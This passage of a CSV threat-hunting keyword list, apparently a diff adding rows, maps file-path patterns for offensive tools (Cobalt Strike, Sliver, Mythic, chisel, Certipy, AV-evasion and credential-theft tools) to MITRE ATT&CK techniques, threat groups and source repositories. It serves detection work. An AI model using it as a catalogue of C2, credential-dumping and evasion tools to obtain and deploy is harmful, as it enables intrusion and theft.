T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 
- T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" +"*/BypassCredGuard.git*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" +"*/BypassFramework.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*/bypassuac/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/C2/Beacon/*.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*/c2/c2.go*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/C2/c2.go*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" +"*/C2/Http/*.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 
- TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*/C2/server.py*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*/C2/SmbListener.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*/c2/tcp-stager.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/c2_code/*.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/c2_code/server*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/C2_Profiles/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/C2_Server.git*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*/c2_server/resources*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*/c2_test.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/C2concealer*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - 
T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" +"*/C2concealer*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/C2Frame.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/C2Manager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - 
T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*/c2profile.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/c2profile.go*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/C2Profiles/*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/C2script/*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*/C2Server.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/C2-Tool-Collection/*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*/cain.html*","offensive_tool_keyword","Cain&Abel","Cain & Able exploitation tool file ","T1075 - T1110 - T1071 - T1003 - T1555","TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/undergroundwires/CEH-in-bullet-points/blob/master/chapters/08-sniffing/sniffing-tools.md","1","1","N/A","N/A","8","745","233","2023-09-28T15:38:54Z","2021-05-11T12:38:17Z" +"*/campaign/*/implant/get_all*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*/canary.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/CandyPotato.cpp*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" +"*/CandyPotato.sdf*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" +"*/CandyPotato.sln*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. 
This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z"
+"*/CandyPotato.vcxproj*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z"
+"*/CapBypass.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z"
+"*/carlosevieira/Dirty-Pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z"
+"*/cassandra-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/cassandra-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/cc2_frp.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*/cccam-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/cerbrutus*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z"
+"*/Certipy.git*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z"
+"*/Certipy/*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z"
+"*/CertStealer*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z"
+"*/certsync.git*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" 
+"*/cfn__resource_injection_lambda*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/ChainBuilder.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z"
+"*/charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z"
+"*/charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z"
+"*/CheckPort.exe*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z"
+"*/CheeseTools.git*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
+"*/Chimera.git*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z"
+"*/Chimera.git*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z"
+"*/chimera.py*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z"
+"*/chimera.sh*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - 
T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z"
+"*/chisel.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*/chisel.git*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*/chisel@latest*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*/chisel-darwin_amd64*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*/chisel-freebsd*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
